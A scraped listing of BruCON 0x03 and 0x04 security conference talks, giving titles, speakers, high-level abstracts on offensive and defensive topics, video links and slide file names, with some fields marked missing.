Lead Security Community Outreach and Strategy team at MicrosoftKatie Moussouris<<MISSING INFO>>https://www.youtube.com/watch?v=W1fwSYpsBwk<<MISSING>>
81
Talk
0x04
Introducing the Smartphone Penetration Testing FrameworkGeorgia WeidmanAs smartphones enter the workplace, sharing the network and accessing sensitive data, it is crucial to be able to assess the security posture of these devices in much the same way we perform penetration tests on workstations and servers. However, smartphones have unique attack vectors that are not currently covered by available industry tools. The smartphone penetration testing framework, the result of a DARPA Cyber Fast Track project, aims to provide an open source toolkit that addresses the many facets of assessing the security posture of these devices. We will look at the functionality of the framework including information gathering, exploitation, social engineering, and post exploitation through both a traditional IP network and through the mobile modem, showing how this framework can be leveraged by security teams and penetration testers to gain an understanding of the security posture of the smartphones in an organization. We will also show how to use the framework through a command line console, a graphical user interface, and a smartphone based app. Demonstrations of the framework assessing multiple smartphone platforms will be shown.https://www.youtube.com/watch?v=qAf8PqyPFroBruCON 0x04 - Introducing the Smartphone Pentesting Framework .pdf
82
Talk
0x04
HTML5 - A Whole New Attack VectorRobert McArdleHTML5 opens up a wide and wonderful new world for Web Designers to explore - bringing fantastic new features that were previously only possible via Flash or horribly over-complicated Javascript. And HTML5 is not a future technology - chances are your favourite browser already has excellent support built in (unless you are still using IE).

In this talk we will look at HTML5 from an attackers view-point. Because not only does HTML5 bring us Semantic web, editable content, inbuilt form validation, local storage, awesome video support and the long overdue death of <div> - it also opens up a host of new opportunities for attackers.

We'll look at some of the troublesome new attacks that this new HTML5 standard introduces, how attackers can leverage these attacks to cause untold havoc on your machine, and how - with a little bit of help from some not so over-complicated Javascript - we can build Botnets in your Browser! I HAVE SHOES! BANANA!
<<MISSING>>BruCON 0x04 - HTML5 - A Whole New Attack Vector.zip
83
Talk
0x04
Security of National eID (smartcard-based) Web ApplicationsRaul SilesNational electronic identification (eID) smartcards are used by millions of European citizens, like in Belgium or Spain, as well as worldwide, as a key element to authenticate against critical web applications on both the public and private sectors. This identification technology commonly used to access a variety of web eGovernment services, plus financial, insurance, and utility companies websites, is considered secure. However, due to the lack of web auditing and pen-testing tools to thoroughly evaluate the smartcard-based authentication process and subsequent session management capabilities... can we really trust the security of these eID services and web applications? The eID smartcard can be secure but... is it used in a secure way? Let's take an in-depth look at the current landscape through security tools, practical demonstrations, and educational scenarios from real-world penetration tests on a worldwide leading country like Spain, with more than 25 million eIDs. <<MISSING>>BruCON 0x04 - Security of National eID.pdf
84
Talk
0x04
Cyberwar : Not What We Were ExpectingJosh Corman and JerichoWith all the hyperbole and rhetoric surrounding "Cyber-War", we've grown blind to the real conflicts. Cyber-War is upon us, but it is NOT like you expected. Citizens are all involved (or will be), but we are not prepared.

The conflicts don't have clean battle lines, aren't fought by or between traditional states, and are far more personal and idealogical. Historically, we have only seen cyberwar through failed analogies, or our own greedy lenses. In doing so, we have failed to give proper attention to the subject, let alone understand it. This talk will be more than an honest analysis of the past, present, and near future of cyber-war. From the DARPAnet goals of the Internet, to the original AntiSec's "inevitable conflict", to the guerilla warfare that we must come to understand, we'll outline what cyber-war isn't and, more importantly, what it is and will become.

When the shit hits the fan, what role will you play? It's past time to prepare yourself; will you be a warrior, minute man, survivalist, or collateral damage?
https://www.youtube.com/watch?v=slvT-GgOzQ0BruCON 0x04 - CyberWar Not What We Were Expecting.pptx
85
Talk
0x04
A Million Mousetraps: Using Big Data and Little Loops to Build Better DefensesAllison MillerIn many technical functions, automation is critical to maintaining stable, predictable, and effective operations. Security is no exception, especially in environments with thousands or even millions of customers, transactions, endpoints, or actions -- manual intervention has to be the exception and not the expectation. But how does an organization automate security, given all the complexity of a large threat surface and unpredictable attackers? Many environments (including financial systems, game platforms, and social networks) turn to analytics, specifically risk models, to automate risk detection and security decisions. In this session, we will walk-through the process for designing and deploying data-driven models and decision technology. <<MISSING>>BruCON 0x04 - A Million Mousetraps Using Big Data and Little Loops to Build Better Defenses - Allison Miller.pdf
86
Talk
0x04
New flaws in WPA-TKIPMathy VanhoefFirst an overview of the WPA-TKIP protocol is given and the currently known attacks are discussed, along with a brief history of WEP. Then two new attacks on WPA-TKIP are presented. The first attack is an efficient and practical denial of service attack where the attacker only has to inject two frames each minute to disrupt all traffic. The second attack describes a scenario where an attacker is able to decrypt all traffic on a WPA-TKIP secured network. The second attack has multiple requirements that are rarely satisfied in real-world environments. Nevertheless it’s the first known attack on the WPA-TKIP specification capable of decrypting all transmitted traffic. <<MISSING>>BruCON 0x04 - New Flaws In WPA TKIP.pdf
87
Talk
0x04
Uncovering SAP vulnerabilities: dissecting and breaking the Diag protocolMartin GalloNowadays, SAP Netweaver has become the most extensive platform for building enterprise applications and run critical business processess. In recent years it has become a hot topic in information security, at the time that headlines about hacks against SAP systems increases everyday. Although, while fixes and countermeasures are released monthly by SAP at an incredibly rate, the available security knowledge is limited and some components are still not well covered.

SAP Diag is the application-level protocol used for communications between SAP GUI and SAP Netweaver Application Servers and it's a core part of any ABAP-based SAP Netwever installation. Therefore, if an attacker is able to compromise this component, this would result in a total takeover of a SAP system. In recent years, the Diag protocol has received some attention from the security community and several tools were released focused on decompression and sniffing. Nevertheless, protocol specification is not public and internal components and inner-workings remains unkown; the protocol was not understood and there is no publicly available tool for active exploitation of real attack vectors.

This talk is about taking SAP penetration testing out of the shadows and sheedding some light into SAP Diag, by introducing a novel way to uncover vulnerabilities in SAP sofware through a set of tools that allows analysis and manipulation of the SAP Diag protocol. In addition, we will show how these tools and the acquired knowledge while researching the protocol can be used for vulnerability research, fuzzing and practical exploitation of novel attack vectors involving both SAP's client and server applications: man-in-the-middle attacks, RFC calls injection, rogue SAP servers deployment, SAP GUI client-side attacks and more. As a final note, this presentation will also show how to harden your SAP installations and mitigate these threats.
<<MISSING>>BruCON 0x04 - Uncovering SAP Vulnerabilities.pdf
88
Talk
0x04
Recent Advances in IPv6 SecurityFernando GontThe IPv6 protocol suite was designed to accommodate the present and future growth of the Internet, and is expected to be the successor of the original IPv4 protocol suite. It has already been deployed in a number of production environments, and many organizations have already scheduled or planned its deployment in the next few years. Additionally, a number of activities such as the World IPv6 Day in 2011 and the upcoming World IPv6 Launch Day (scheduled for June 2012) have led to an improvement in IPv6 awareness and an increase in the number of IPv6 deployments.

There are a number of factors that make the IPv6 protocol suite interesting from a security standpoint. Firstly, being a new technology, technical personnel has much less confidence with the IPv6 protocols than with their IPv4 counterpart, and thus it is more likely that the security implications of the protocols be overlooked when the protocols are deployed. Secondly, IPv6 implementations are much less mature than their IPv4 counterparts, and thus it is very likely that a number of vulnerabilities will be discovered in them before their robustness matches that of the existing IPv4 implementations. Thirdly, security products such as firewalls and NIDS’s (Network Intrusion Detection Systems) usually have less support for the IPv6 protocols than for their IPv4 counterparts, either in terms of features or in terms of performance. Fourthly, the security implications of IPv6 transition/co-existence technologies on existing IPv4 networks are usually overlooked, potentially enabling attackers to leverage these technologies to circumvent IPv4 security measures in unexpected ways.

During the last few years, the UK CPNI (Centre for the Protection of National Infrastructure) carried out the first comprehensive security assessment of the Internet Protocol version 6 (IPv6) and related technologies (such as transition/co-existence mechanisms). The result of the aforementioned project is a series of documents that provide advice both to programmers implementing the IPv6 protocol suite and to network engineers and security administrators deploying or operating the protocols. Part of the results of the aforementioned project have been recently published, leading to a number of improvements in many IPv6 implementations, and in the protocol specifications themselves. Fernando Gont will discuss the results of the aforementioned project, introducing the attendees to the “state of the art” in IPv6 security, and providing advice on how to deploy the IPv6 protocols securely. Gont will also discusss recent advances in IPv6 security areas such as Denial of Service attacks, firewall circumvention, network reconnaissance, and First-Hop security, and will describe other IPv6 security areas in which further work is needed. Finally, he will describe some vulnerabilities found in popular IPv6 implementations, such as NDbased Denial of Service attacks, and vulnerabilities arising from the use of predictable IPv6 Fragment Identification or Flow Label values.
https://www.youtube.com/watch?v=Eq6vwJc45eMBruCON 0x04 - Recent Advances in IPv6 Security.pptx
89
Talk
0x04
pMap, the silent killerGregory PickettWith auto-configuration protocols now being added to operating systems and implemented by default in your network devices, hosts are now actively advertising their available attack surfaces to anyone listening on the network.

In this session, I will debut my new tool pMap. pMap listens silently and without sending any packets is able to extract information from these advertisements to discover hosts, to perform a port scan, and to fingerprint operating systems and services on these hosts. A multi-purpose tool this can be used to mitigate the risks advertising hosts bring to your environment or to attack the local segment within the enterprise as well as the public arena when these enterprise hosts leave the safety of the network.

We’ll first cover what makes all this possible, then examine typical network traffic to see what is made available to us, and then demonstrations will be given highlighting the use of the tool’s features in a variety of scenarios from the defensive to the offensive including as part of a remote attack using Metasploit where the tool is deployed as a Metasploit module on a compromised host to allow a silent, undetectable profiling of the remote network. Don't miss it!
<<MISSING>>BruCON 0x04 - Pmap The Silent Killer.pdf
90
Talk
0x04
How I met your pointer (Hijacking client software for fuzz and profit)Carlos GarciaLooking for vulnerabilities in closed source software is particularly difficult when the researcher is confronted with proprietary and/or undocumented protocols. Several approaches could be taken to attack this problem like for example, full reverse engineering or dumb fuzzing. Unfortunately, these are either incredibly time/brain consuming or highly inefficient.

In this talk another way will be shown, namely, the manipulation of client software using binary instrumentation techniques in order to use them as kind of 'double agents' against the server they are talking to.

Some small tools and code examples will be released after the talk for everybody to play with.
https://www.youtube.com/watch?v=rQ36_2qStWgBruCON 0x04 - How I Met Your Pointer.pdf
91
Talk
0x04
Satellite HackingPaul Marsh
What sort of data can be received from the vast numbers of satellites in orbit around the Earth? What are the various types of satellite orbits, and what equipment is needed to start 'hacking' satellites. These questions, and more, will be answered in this talk which discusses satellite hacking techniques. Real life examples of traffic, data and audio communications received will be presented. We'll also take a critical look at a UK military satellite hacking incident which was widely reported in the press, and consider the commonly asked question -"can it be done?"
<<MISSING>><<MISSING>>
92
Talk
0x04
Tactical Surveillance : Look at me now!Chris Nickerson<<MISSING INFO>><<MISSING>><<MISSING>>
93
Talk
0x04
We have you by the gadgetsMickey ShkatovWhy send someone an executable when you can just send them a sidebar gadget?

We will be talking about the windows gadget platform and what the nastyness that can be done with it, how are gadgets made, how are they distributed and more importantly their weaknesses.

Gadgets are comprised of JS, CSS and HTML and are application that the Windows operating system has embedded by default. As a result there are a number of interesting attack vectors that are interesting to explore and take advantage of. We will be talking about our research into creating malicious gadgets, misappropriating legitimate gadgets and the sorts of flaws we have found in published gadgets.
https://www.youtube.com/watch?v=7TCsOlRmYEQ BruCON 0x04 - We Have You By The Gadgets.pptx
94
Talk
0x04
Moar Anti-Forensics for the Louiseint0x80 (or Dual Core)This presentation is the new and improved anti-forensics version of those "Stupid Pet Tricks" segments on late night US talk shows. Nothing ground-breaking here, but there may be some ideas and techniques presented that forensic investigators haven’t considered or encountered.https://www.youtube.com/watch?v=SHvvhukyO-c<<MISSING>>
95
Talk
0x04
The Defense RESTs: Automation and APIs for Improving SecurityDavid MortmanWant to get better at security? Improve your ops and improve your dev. Most of the security tools you need aren't from security vendors, they don't even need to be commercial. You need tools like chef & puppet, jenkins, logstash + elasticsearch & splunk or even hadoop to name but a few. The key is to centralize management, automate and test.

Testing is especially key, like Jeremiah says "Hack Yourself First". So many vulnerabilities can be detected automatically. Let the machines do that work and find the basic XSS, CSRF and SQLi flaws, not to mention buffer overflows, Save the manual effort for the more complex versions of the above attacks and for business logic flaws. This is one of those spaces that dedicated security tools are a must. Leverage APIs (and protect API endpoints), be evidence driven. Counter intuitively, deploy more often, with smaller change sets. Prepare for fail and fail fast but recover faster. Not just theory, will include real examples with real code including open protocols like netconf and open source software like dasein-cloud.

There will be no discussion of APT, DevOps vs NoOps, BYOD or Cloud Security concerns, there will however be baked goods assuming I can get the through customs.
<<MISSING>>BruCON 0x04 - The Defense RESTs Automation and APIs for Improving Security - David Mortman.pdf
96
97
Keynote
0x03
Why Information Risk Management Is Failing, Why That Matters to Security & What You Can Do About ItAlex HuttonIn many organizations, you don't have to be a rocket surgeon to figure out that there's a disconnect between operational security and risk management. Nor do you have to be Myron Tribus (http://en.wikipedia.org/wiki/Myron_Tribus) to figure out what's wrong with the way we currently discuss and model the world around us. So what do we do about it? Is there any way to have these machinations actually, you know, stop bad guys? Because that would probably be a good thing.

My name is Alex Hutton, and I'm Director of Operational Risk for a financial institution in the United States. In this talk, I'll be discussing what's wrong with information security and risk management, how something we might refer to as "science" can help (I hear it's big in most enlightened countries), and after all this fun and drinking is over, what we can go back to our desks at work and do about it.
https://archive.org/details/brucon2011video<<MISSING>>
98
Talk
0x03
IOS Data Protection InternalsAndrey BelenkoData protection is a feature available for iOS 4 devices with hardware encryption: iPhone 4, iPhone 3GS, iPod touch (3rd generation or later), and all iPad models. Introduction of this feature had complicated iPhone forensics process because now (almost) all files on user partition are encrypted and physical dumps are of much less value to examiners: while the filesystem seems to be intact, actual file contents are encrypted and are not suitable for analysis. This talk will provide in-depth information about iOS 4 Data protection internals.<<MISSING>>BruCON 0x03 - iOS Data Protection Internals - Andrey Belenko.pdf
99
Talk
0x03
Botnet Identification and remediationBarry IrwinModern botnet trends have become increasingly sophisticated both in terms of the techniques used to avoid detection on compromised endpoints, but also in their varied communication channels. The use of IRC as the communications medium of choice for Command & Control (C2) activities has been replaced with sophisticated use of IP and domain fast-fluxing to avoid detection and increase resilience. These techniques largely bypass traditional network security detection and mitigation approaches such as blacklists and intrusion detection systems.

In the ongoing defence against these networks, a number of novel approaches are presented in order to allow an organisation to perform near realtime analysis of network traffic with very low system load. The intention of these is that an organisation or ISP could use the tools as a means of early identification of compromised hosts participating in the botnet. This paper is comprised of three components, the first two relating to detection mechanism, and the final one providing a console which can be used to tracking and information aggregation.

The first detection technique utilises passive analysis of DNS traffic collected from the network. Due to its tight integration with the TCP/IP suite, it serves as an ideal transport mechanism for communications. Using a combination of classifiers, a high degree of accuracy is obtained in the identification of fast flux domains, using at most a single DNS packet query. This is in contrast to work done by other researchers which required multiple queries. The detection techniques are tested against sample traffic and it is shown that malicious traffic can be detected with low false positive rates. This can be combined with a more heavyweight scoring system which utilises other metadata such as registrar, domain age and ASN data to further support scoring.

The second component applies a lightweight mathematical classification to observed URLs contained in network traffic. This can either be via a network tap, or integrated into a proxy server solution such as squid. The methods used are able to identify malicious urls with a high degree of accuracy, while maintaining a low false positive rate. This lightweight solutionc an be further supported by active queries relating to target ASN, Domain registrar, and other existing blacklists and dnsbl systems.

The final component provides a web based management and visualisation system providing integration between the above two classes in order to allow for ease of notification of malicious activity. The anticipated target for theses solutions are Academic networks, ISPs and to a lesser extent corporate networks. The intention being that by providing suitable monitoring and analysis of traffic egressing ones network, re-mediation can be carried out by the organisation closest to the infection – in effect cleaning up ones own back yard. A role that this can play other than the operational one described, is to provide researchers with access to suitable data (either live networks or even malware labs) to have an automated means of identifying potentially malicious activity, with very low resource requirements.
<<MISSING>>BruCON 0x03 - Botnet Identification and remediation - Barry Irwin.pdf
100
Talk
0x03
Smart Phones, the weak link in the security chainNick Walker and Werner NelOne of the most rapidly advancing aspects of technology today is the mobile phone. Use of a smart phone has become commonplace within both business and society, and many people rely on these devices in their day to day lives. As they increase in both power and functionality, smart phones become both a feasible target and a weapon for an attacker. With these mobile devices having more externally facing services than most other systems, a large attack surface is available. As this talk will show that once compromised, a smart phone of an employee is a deadly tool for breaking in and maintaining a foothold on a corporate network. The talk will demonstrate a multi-staged attack on an non-rooted android handset, running the most common stock firmware versions.<<MISSING>><<MISSING>>
Loading...
 
 
 
Talk Overview
INFO